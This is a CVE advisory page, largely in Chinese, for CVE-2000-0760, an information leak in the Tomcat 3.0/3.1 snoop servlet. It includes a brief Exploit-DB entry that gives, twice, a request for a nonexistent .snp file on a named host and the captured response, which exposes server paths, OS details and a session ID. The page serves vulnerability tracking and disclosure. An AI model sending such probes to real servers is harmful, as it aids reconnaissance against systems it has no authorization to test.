CVE-2000-0760
CVSS6.4
发布时间 :2000-10-20 00:00:00
修订时间 :2008-09-05 16:21:49
NMCOES    

[原文]The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.


[CNNVD]Apache Tomcat Snoop Servlet远程信息泄漏漏洞(CNNVD-200010-122)

        
        Tomcat是Apache Software Foundation出品的一个使用广泛的Java服务器程序,可以作为其它HTTP服务器的插件也可以独立运行。
        Tomcat的snoop servlet组件存在一个安全问题,可能会泄漏服务器的敏感信息。
        向Tomcat请求一个不存在的以 .snp 为扩展名的文件就会从服务器返回很多对入侵者很有用的信息,包括Web绝对路径,操作系统类型等。
        

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:apache:tomcat:3.1Apache Software Foundation Tomcat 3.1
cpe:/a:apache:tomcat:3.0Apache Software Foundation Tomcat 3.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0760
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0760
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-122
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Flist%3D1%26date%3D2000-07-15%26msg%3DPine.SUN.3.96.1000719235404.24004A-100000@grex.cyberspace.org
(VENDOR_ADVISORY)  BUGTRAQ  20000719 [LoWNOISE] Snoop Servlet (Tomcat 3.1 and 3.0)
http://www.securityfocus.com/bid/1532
(VENDOR_ADVISORY)  BID  1532

- 漏洞信息

Apache Tomcat Snoop Servlet远程信息泄漏漏洞
中危 设计错误
2000-10-20 00:00:00 2006-08-03 00:00:00
远程  
        
        Tomcat是Apache Software Foundation出品的一个使用广泛的Java服务器程序,可以作为其它HTTP服务器的插件也可以独立运行。
        Tomcat的snoop servlet组件存在一个安全问题,可能会泄漏服务器的敏感信息。
        向Tomcat请求一个不存在的以 .snp 为扩展名的文件就会从服务器返回很多对入侵者很有用的信息,包括Web绝对路径,操作系统类型等。
        

- 公告与补丁

        厂商补丁:
        Apache Group
        ------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        
        http://jakarta.apache.org/tomcat/index.html

- 漏洞信息 (20132)

Tomcat 3.0/3.1 Snoop Servlet Information Disclosure Vulnerability (EDBID:20132)
multiple remote
2000-07-20 Verified
0 ET LoWNOISE
N/A [点击下载]
source: http://www.securityfocus.com/bid/1532/info

A vulnerability exists in the snoop servlet portion of the Tomcat package, version 3.1, from the Apache Software Foundation. Upon hitting an nonexistent file with the .snp extension, too much information is presented by the server as part of the error message. This information may be useful to a would be attacker in conducting further attacks. This information includes full paths, OS information, and other information that may be sensitive. 

http://narco.guerrilla.sucks.co:8080/examples/jsp/snp/anything.snp
====
Snoop Servlet

Servlet init parameters:

Context init parameters:

Context attributes:
javax.servlet.context.tempdir =
/appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples
sun.servlet.workdir =
/appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples

Request attributes:

Servlet Name: snoop
Protocol: HTTP/1.0
Scheme: http
Server Name: narco.goverment.sucks.co
Server Port: 8080
Server Info: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.1.8; AIX
4.2 POWER_RS; java.vendor=IBM Corporation)
Remote Addr: xxx.xxx.xxx.xxx
Remote Host: xxx.xxx.xxx.xxx
Character Encoding: null
Content Length: -1
Content Type: null
Locale: en
Default Response Buffer: 8192

Parameter names in this request:

Headers in this request:
Host: narco.goverment.sucks.co:8080
Accept-Encoding: gzip
Cookie: JSESSIONID=To1212mC7833304641226407At
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png,
*/*
Connection: Keep-Alive
Accept-Charset: iso-8859-1,*,utf-8
User-Agent: Mozilla/4.51 [en] (Winsucks; I)
Accept-Language: en

Cookies in this request:
JSESSIONID = To1212mC7833304641226407At

Request Is Secure: false
Auth Type: null
HTTP Method: GET
Remote User: null
Request URI: /examples/jsp/snp/anything.snp
Context Path: /examples
Servlet Path: /jsp/snp/anything.snp
Path Info: null
Path Trans: null
Query String: null

Requested Session Id: To1212mC7833304641226407At
Current Session Id: To1212mC7833304641226407At
Session Created Time: 964047263477
Session Last Accessed Time: 964047528749
Session Max Inactive Interval Seconds: 1800

Session values:
numguess = num.NumberGuessBean@6bfa9a1 		

- 漏洞信息

377
Apache Tomcat Snoop Servlet Remote Information Disclosure
Remote / Network Access Information Disclosure
Loss of Confidentiality Workaround
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-07-19 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this vulnerability. It is possible to temporarily work around the flaw by implementing the following workaround: Delete the Snoop servlet.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
Design Error 1532
Yes No
2000-07-20 12:00:00 2009-07-11 02:56:00
This vulnerability was posted to the Bugtraq mailing list on July 20, 2000 by ET LoWNOISE <et@cyberspace.org>

- 受影响的程序版本

Apache Software Foundation Tomcat 3.1
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Conectiva Linux 5.1
- Debian Linux 2.2
- Debian Linux 2.1
- Digital UNIX 4.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- SGI IRIX 6.5
- SGI IRIX 6.4
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Apache Software Foundation Tomcat 3.0
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Debian Linux 2.2
- Debian Linux 2.1
- Digital UNIX 4.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4 x86
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- SGI IRIX 6.5
- SGI IRIX 6.4
- Sun Solaris 8_sparc
- Sun Solaris 7.0

- 漏洞讨论

A vulnerability exists in the snoop servlet portion of the Tomcat package, version 3.1, from the Apache Software Foundation. Upon hitting an nonexistent file with the .snp extension, too much information is presented by the server as part of the error message. This information may be useful to a would be attacker in conducting further attacks. This information includes full paths, OS information, and other information that may be sensitive.

- 漏洞利用

http://narco.guerrilla.sucks.co:8080/examples/jsp/snp/anything.snp
====
Snoop Servlet

Servlet init parameters:

Context init parameters:

Context attributes:
javax.servlet.context.tempdir =
/appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples
sun.servlet.workdir =
/appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples

Request attributes:

Servlet Name: snoop
Protocol: HTTP/1.0
Scheme: http
Server Name: narco.goverment.sucks.co
Server Port: 8080
Server Info: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.1.8; AIX
4.2 POWER_RS; java.vendor=IBM Corporation)
Remote Addr: xxx.xxx.xxx.xxx
Remote Host: xxx.xxx.xxx.xxx
Character Encoding: null
Content Length: -1
Content Type: null
Locale: en
Default Response Buffer: 8192

Parameter names in this request:

Headers in this request:
Host: narco.goverment.sucks.co:8080
Accept-Encoding: gzip
Cookie: JSESSIONID=To1212mC7833304641226407At
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png,
*/*
Connection: Keep-Alive
Accept-Charset: iso-8859-1,*,utf-8
User-Agent: Mozilla/4.51 [en] (Winsucks; I)
Accept-Language: en

Cookies in this request:
JSESSIONID = To1212mC7833304641226407At

Request Is Secure: false
Auth Type: null
HTTP Method: GET
Remote User: null
Request URI: /examples/jsp/snp/anything.snp
Context Path: /examples
Servlet Path: /jsp/snp/anything.snp
Path Info: null
Path Trans: null
Query String: null

Requested Session Id: To1212mC7833304641226407At
Current Session Id: To1212mC7833304641226407At
Session Created Time: 964047263477
Session Last Accessed Time: 964047528749
Session Max Inactive Interval Seconds: 1800

Session values:
numguess = num.NumberGuessBean@6bfa9a1

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站